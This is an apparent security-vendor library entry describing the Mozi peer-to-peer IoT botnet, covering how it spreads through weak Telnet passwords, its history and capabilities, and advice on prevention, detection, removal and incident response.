Mozi Botnet
Mozi: Peer-to-Peer Botnet Targeting Linux-Based Devices
Mozi is a Linux-based malware strain that forms a peer-to-peer botnet, primarily targeting routers, DVRs, and IoT devices through weak telnet passwords and known vulnerabilities. First discovered in 2019 and rapidly expanded in 2020, Mozi has been used to carry out DDoS attacks, payload delivery, and data exfiltration, with a focus on Linux-based embedded systems that are often poorly secured.
Introduction to Mozi
The Mozi botnet evolved from earlier IoT malware like Mirai and Gafgyt, but with a more advanced architecture and persistence model. It leverages the Distributed Hash Table (DHT) protocol, allowing it to operate without central command-and-control servers—making it harder to dismantle. Mozi's main targets are Linux-based systems, particularly consumer-grade routers and connected devices with open ports or default credentials.
1. How Mozi Works
Infection Mechanism:
Mozi spreads by scanning the internet for devices with open Telnet ports or known firmware vulnerabilities. It uses default or weak credentials to log in and deploy its payload, or it exploits flaws in outdated software. Once inside, it installs a lightweight binary tailored to the device’s architecture (e.g., MIPS or ARM).
Payload Execution:
After gaining a foothold, Mozi connects to its peer-to-peer network, joining the botnet. It then waits for instructions—these often include launching DDoS attacks, downloading other malware, or attempting to spread laterally to other vulnerable systems. Mozi also implements persistence mechanisms to survive reboots and evade factory resets.
2. History and Notable Campaigns
Origin and Discovery:
Mozi was first identified in late 2019 by researchers at 360 Netlab. It quickly gained attention for its DHT-based command model and explosive growth in infected devices, especially in China and India.
Notable Campaigns:
Mozi-powered botnets were responsible for several large-scale DDoS attacks against telecom infrastructure, gaming servers, and cloud providers. In 2021, researchers noted that Mozi infections made up over 90% of IoT botnet traffic at certain points, indicating its dominance in the Linux-based malware space.
3. Targets and Impact
Targeted Victims and Sectors:
Mozi focuses on Linux-based embedded devices, including:
- Routers (Netgear, Huawei, D-Link, etc.)
- DVRs and IP cameras
- Smart home devices
- Industrial IoT gear
Consequences:
Once infected, devices become part of a massive global botnet. This can lead to:
- Slowed or disrupted device performance
- Use of your bandwidth for DDoS attacks
- Risk of secondary malware infections
- Network exposure, allowing deeper attacks into home or business networks
4. Technical Details
Payload Capabilities:
- Launches various DDoS attacks (UDP, TCP flood, etc.)
- Executes remote shell commands
- Updates and spreads new malware variants
- Maintains persistence using crontabs or script injections
- Participates in peer-to-peer communication via DHT
Evasion Techniques:
- Uses P2P networking, which eliminates a central C2 server
- Encrypts payload traffic to avoid detection
- Adjusts payloads based on target architecture (cross-compilation)
- Hides within normal system processes or as innocuous binaries
5. Preventing Mozi Infections
Best Practices:
- Change default passwords on all routers and IoT devices
- Disable Telnet, UPnP, and remote admin features if not needed
- Regularly update firmware and monitor vendor security notices
- Use network segmentation for IoT devices
- Close unused ports and restrict external access to management interfaces
Recommended Security Tools:
- IoT-specific firewall appliances or intrusion detection systems
- Endpoint protection for Linux (e.g., CrowdStrike Falcon, Trend Micro Deep Security)
- Open-source tools like Fail2Ban, Suricata, or pfSense
- Router firmware alternatives like OpenWrt with enhanced security
6. Detecting and Removing Mozi
Indicators of Compromise (IoCs):
- Suspicious network traffic from IoT devices, especially outbound UDP floods
- Presence of unfamiliar binaries in /tmp/, /etc/init.d/, or scheduled tasks
- CPU spikes on routers or smart devices with no visible cause
- Unauthorized login attempts or repeated scanning behavior
Removal Steps:
- Perform a factory reset on the infected device
- Immediately update firmware to patch vulnerabilities
- Change all credentials and disable remote access features
- Scan the local network for signs of lateral movement
- Monitor traffic for recurrence—some variants can reinfect within minutes if entry points remain open
Professional Help:
Infected enterprise environments or industrial networks should contact a cybersecurity incident response team. Mozi infections can indicate larger security gaps and may require infrastructure-wide hardening.
7. Response to a Mozi Infection
Immediate Steps:
- Disconnect infected devices from the internet
- Reset and re-secure compromised systems
- Identify and close open ports across the network
- Deploy firewalls or rate-limiting tools to block outbound attack traffic
8. Legal and Ethical Implications
Legal Considerations:
Devices participating in a botnet—even unknowingly—could be used in criminal activities like DDoS attacks, which may lead to ISP warnings or liability in certain jurisdictions.
Ethical Considerations:
The Mozi botnet exploits consumer negligence and manufacturer insecurity. It highlights the ethical need for better IoT regulation, secure-by-design devices, and responsible disclosure by vendors.
9. Resources and References
- 360 Netlab: Mozi Botnet Technical Report
- Trend Micro: Backdoor.Linux.MOZI.A
- CISA Blog: Securing the Internet of Things (IoT)
- Shodan for identifying exposed devices
10. FAQs about Mozi
Q: What is Mozi malware?
A Linux-based botnet that infects routers and IoT devices to carry out attacks and expand its network.
Q: How does Mozi spread?
By exploiting default passwords and unpatched firmware vulnerabilities in internet-connected devices.
Q: What does Mozi do?
It joins infected devices into a peer-to-peer botnet used for DDoS attacks, malware delivery, and system control.
Q: Can Mozi be removed?
Yes, but it often requires a factory reset, firmware update, and network hardening to prevent reinfection.
11. Conclusion
Mozi is one of the most widespread Linux-based botnets ever observed, and it thrives on insecure IoT devices and overlooked routers. Its peer-to-peer model and aggressive scanning make it a resilient threat that’s hard to eliminate once embedded. Preventing Mozi infections requires good device hygiene, aggressive patching, and smarter network management—especially as the number of connected devices continues to grow.
« Back to the Virus Information Library